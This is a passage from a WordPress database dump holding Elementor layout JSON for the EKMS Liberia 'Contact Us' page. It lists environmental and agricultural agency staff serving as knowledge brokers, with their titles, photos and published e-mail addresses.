"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24482,3613,'_elementor_edit_mode','builder'),(24483,3613,'_elementor_template_type','wp-page'),(24484,3613,'_elementor_version','3.0.16'),(24485,3613,'_wp_page_template','default'),(24486,3613,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"e